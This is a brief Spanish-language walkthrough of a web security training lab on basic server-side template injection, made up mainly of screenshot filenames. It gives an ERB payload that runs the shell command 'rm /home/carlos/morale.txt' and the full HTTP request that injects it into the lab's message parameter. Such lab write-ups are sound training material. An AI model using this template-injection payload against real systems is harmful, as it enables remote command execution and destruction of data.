Skip to content

20251117160247.png

Lab: Basic server-side template injection

Con ayuda de este recurso podemos enumerar SSTI

20251117161024.png

Con ayuda de este recurso podemos eliminar el archivo indicado para completar el laboratorio.

Por lo que para ejecutar comando podemos usar: <%= system("rm /home/carlos/morale.txt") %>

c
GET /?message=<%=+system("rm+/home/carlos/morale.txt")+%> HTTP/2

Host: 0abb0096049e69f78524b3b4006400b8.web-security-academy.net

20251117161429.png